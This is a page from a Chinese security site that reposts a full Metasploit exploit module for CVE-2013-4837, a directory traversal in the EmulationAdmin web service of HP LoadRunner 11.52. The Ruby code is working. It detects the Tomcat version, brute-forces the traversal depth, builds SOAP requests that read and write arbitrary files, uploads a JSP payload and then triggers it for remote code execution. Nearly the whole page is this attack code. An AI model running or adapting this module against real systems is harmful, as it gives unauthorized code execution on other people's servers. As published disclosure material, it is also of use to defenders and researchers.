首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP LoadRunner EmulationAdmin Web Service Directory Traversal
来源:metasploit.com 作者:rgod 发布时间:2013-12-12  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
require 'rexml/document'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }
  
  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal',
      'Description' => %q{
        This module exploits a directory traversal vulnerability on the version 11.52 of HP
        LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically
        in the copyFileToServer method, allowing to upload arbitrary files. This module has
        been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2.
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-4837' ],
          [ 'OSVDB', '99231' ],
          [ 'BID', '63475' ],
          [ 'ZDI', '13-259' ],
          [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'win',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'HP LoadRunner 11.52', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 30 2013'))
  
    register_options(
      [
        Opt::RPORT(8080),
        # By default files dropped into C:\windows\system32\null\
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 3 ]),
        # By default HP LoadRunner installed on C:\Program Files\HP\LoadRunner
        OptString.new('INSTALLPATH', [ true, 'HP LoadRunner Install Path (from the root folder)', "Program Files\\HP\\LoadRunner" ])
      ], self.class)
  end
  
  def get_soap_request(action, opts={})
    path_param     = opts[:path]
    contents_param = opts[:contents]
  
    se_name = ''
    case action
    when :upload
      se_name = 'ser:copyFileToServer'
    when :read
      se_name = 'ser:getFileContentAsLines'
    end
  
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:ser'     => "http://service.emulation.ws.mercury.com"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      se_name,
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    ser = body.elements[1]
    ser.add_element("in0", {'xsi:type' => 'xsd:int'})
    ser.elements['in0'].text = 30000 + rand(30000)
    ser.add_element("in1", {'xsi:type' => 'xsd:string'})
    ser.elements['in1'].text = path_param
  
    if action == :upload
      ser.add_element("in2", {'xsi:type' => "xsd:base64Binary"})
      ser.elements['in2'].text = Rex::Text.encode_base64(contents_param)
    end
  
    xml.to_s
  end
  
  def check
    depth = datastore['DEPTH']
    install_path = datastore['INSTALLPATH']
  
    print_status("#{peer} - Detecting tomcat version...")
    tomcat_version = get_tomcat_version
  
    if tomcat_version
      print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...")
      location = ""
      location << install_path
      location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
      location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
  
      res = read_file(depth, location, "index.jsp")
  
      if res and res.code == 200  and res.body.to_s =~ /HP Service Emulation/
        print_good("#{peer} - Traversal exists and parameters are correct...")
        return Exploit::CheckCode::Vulnerable
      elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
        print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")
        return Exploit::CheckCode::Appears
      else
        print_status("#{peer} - Failed to verify the directory traversal...")
      end
    else
      print_error("#{peer} - Tomcat version not detected...")
    end
  
    print_status("#{peer} - Checking if the vulnerable web service and method exist...")
    res = send_request_cgi({
      'uri'    => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'),
      'vars_get' => { 'wsdl' => 1 }
    })
  
    if res and res.code == 200 and res.body.to_s =~ /wsdl.*EmulationAdmin/ and res.body.to_s =~ /copyFileToServerRequest/
      return Exploit::CheckCode::Detected
    end
  
    return Exploit::CheckCode::Safe
  end
  
  def exploit
    depth = datastore['DEPTH']
    install_path = datastore['INSTALLPATH']
  
    print_status("#{peer} - Retrieving the Tomcat version used...")
    tomcat_version = get_tomcat_version
  
    if tomcat_version.nil?
      fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used")
    else
      print_good("#{peer} - Tomcat #{tomcat_version} found")
    end
  
    print_status("#{peer} - Verifying parameters to exploit the directory traversal...")
    brute_force = false
    location = ""
    location << install_path
    location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
    location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
  
    res = read_file(depth, location, "index.jsp")
  
    if res and res.code == 200  and res.body.to_s =~ /HP Service Emulation/
      print_good("#{peer} - Traversal parameters are correct")
    elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
      print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...")
      brute_force = true
    else
      fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters")
    end
  
    if brute_force
      print_status("#{peer} - Trying to brute force the traversal depth...")
      depth = brute_force_depth(location)
      if depth.nil?
        fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH")
      end
      print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...")
    end
  
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
  
    # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests
    print_status("#{peer} - Uploading the JSP payload...")
    res = upload_file(depth, location, jsp_name, payload.encoded)
  
    if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/
      print_status("#{peer} - JSP payload uploaded successfully")
      register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end
  
    print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...")
  
    send_request_cgi({
      'uri'    => normalize_uri('ServiceEmulation', jsp_name),
      'method' => 'GET'
    }, 1)
  end
  
  def send_request_soap(soap_request)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'ServiceEmulation', 'services', 'EmulationAdmin'),
      'method'   => 'POST',
      'ctype'    => 'text/xml; charset=UTF-8',
      'data'     => soap_request,
      'headers'  => {
        'SOAPAction'    => '""',
      }
    })
  
    return res
  end
  
  def upload_file(traversal_depth, location, file_name, contents)
    path = "..\\" * traversal_depth
    path << location
    path << "\\" unless location[-1] == "/" or location[-1] == "\\"
    path << file_name
  
    req = get_soap_request(:upload, {:path => path, :contents => contents})
  
    return send_request_soap(req)
  end
  
  def read_file(traversal_depth, location, file_name)
    path = "..\\" * traversal_depth
    path << location
    path << "\\" unless location[-1] == "/" or location[-1] == "\\"
    path << file_name
  
    req = get_soap_request(:read, {:path => path})
  
    return send_request_soap(req)
  end
  
  def brute_force_depth(location)
    10.times do |i|
      res = read_file(i, location, "index.jsp")
  
      if res and res.code == 200  and res.body.to_s =~ /HP Service Emulation/
        return i
      end
    end
  
    return nil
  end
  
  def get_tomcat_version
    res = send_request_cgi({
      'uri' => normalize_uri('webdav')
    })
  
    if res and res.code == 200 and res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/
      return $1
    end
  
    return nil
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·vBulletin index.php/ajax/api/r
·Adobe ColdFusion 9 Administrat
·ad GOM Player 2.2.53.5169 - SE
·EMC Data Protection Advisor DP
·Up.Time Monitoring Station pos
·Divide Error In Windows Kernel
·Eaton Network Shutdown Module
·Cisco Unified Communications M
·D-Link DSR Router Remote Root
·Castripper 2.50.70 - (.pls) DE
·Steinberg MyMp3PRO 5.0 - Buffe
·Ability Web Server(ftp) - Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved